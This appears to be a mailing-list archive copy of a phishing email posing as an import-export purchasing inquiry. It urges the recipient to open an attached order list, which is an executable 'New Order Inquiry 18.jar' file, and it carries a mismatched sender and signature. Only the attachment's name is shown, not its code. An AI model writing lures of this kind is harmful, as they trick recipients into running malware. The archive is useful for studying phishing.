List:       miros-discuss
Subject:    Aw: New order inquiry
From:       "Connie Olsen"<A3375 () wintact ! com ! tw>
Date:       2018-07-29 11:37:34

Hello,

I am in the purchasing department of an Import & Export Trading company ,  After \
checked your website with our customers, they show great interests . If don't mind, \
please check the list of order detail attached so we can know your products better \
and then order it.     We believe there will be a promising market in our area for \
your goods. We hope a good and long term cooperation in the future.  Connie Olsen / \
Best Regards, Regnskabchef / Financial Manager

Europe Sales ApS -  Danmark ApS
Sorvej 11 - 4200 Slagelse - Denmark
Mobile / direct phone: +45 20 02 55 12
Fax: +45 58 52 72 42

["New Order Inquiry 18.jar" (application/octet-stream)]